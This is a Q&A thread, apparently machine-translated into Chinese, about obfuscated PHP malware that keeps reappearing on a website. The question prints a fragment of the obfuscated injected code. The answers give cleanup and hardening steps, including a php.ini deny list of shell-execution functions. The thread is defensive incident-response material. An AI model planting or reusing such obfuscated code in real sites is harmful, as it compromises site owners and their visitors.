PHP模糊的“ Dodgy”代码出现在我的网站上

Question

我在我的php文件中找到了这个：

<?php $glsaucbk = '5    156 x61"])))) { $GLOBALS["  ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4  x223}!+!<+{e%+*!*+fe4y4 x24-    x24]y8  x24-    x24]26  x24-        x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/

它位于文件的头部...我尝试删除此文件，但直接消失。 我有一个PHP检测器，并说我DodgyPHP。 您是否已经在您的php文件中拥有此恶意代码？

Answer 1

我认为您不需要比已经了解的更多：

• 这是您没想到的代码。
• 显然很模糊； 除了隐藏恶意代码外，很少有理由混淆PHP。
• 当您删除它时，它会重新出现，这意味着还有其他恶意脚本正在运行和自我修复。

您至少应该：

1. 立即使站点脱机。 它可能正在感染其他人，或用于您的帐户进行犯罪活动。
2. 如果这是第三方应用程序（例如Wordpress，PHPBB等），请仅使用最新的知名插件从头开始安装最新版本。 如果它是您编写的代码，则需要对其安全性进行审核，或请专家为此进行审核。
3. 从备份中拯救您的数据，以尽最大可能确保备份来自遭受破坏之前的备份，并将其应用于干净安装的站点。

Answer 2

虽然不是直接答案； 这将是有关清理系统的有用步骤指南。

症状表明您的系统当然也已经被黑客入侵，并且仍然可以被黑客入侵。

您需要点击此处的链接http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/，并采取重要措施来强化您的来自未来黑客的系统：

• 确保运行Web服务器进程的用户ID对其服务的文件没有写权限。 您可以使用ps aux | grep apache ps aux | grep apache或ps aux | grep nginx ps aux | grep nginx查找运行Web服务器的用户ID。 确保文件不属于该用户。 您可以通过执行sudo -u <that userid> touch /path/to/web/files/some_test_file类的操作来检查权限。 如果该操作成功创建了文件，则说明您有问题，需要调整权限。
• 更改所有密码
• 停止使用FTP，使用FTPS或SFTP。
• 将您的PHP更新到最新的最新版本。
  • 将任何PHP CMS程序（Joomla，WordPress等）更新到最新版本。
• 在确定您的备份没有被黑客入侵之后，请从备份中重新加载数据。

• 编辑您的php.ini并禁用危险功能（例如exec ）和类：

    disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, curl_multi_exec,parse_ini_file,show_source" 

• 编辑您的php.ini，并确保检查您的auto_prepend_file和auto_append_file值是预期还是空白。
• 为数据库和服务器访问设置新的用户名。 停止使用Root。 切勿使用Root访问任何内容。
• 检查并阻止无法识别的cron_jobs在服务器上运行。

注意： 其他知道的人可以添加和编辑此帖子，以添加更多有用的指南和信息。 对于将来的读者来说可能是很好的资源。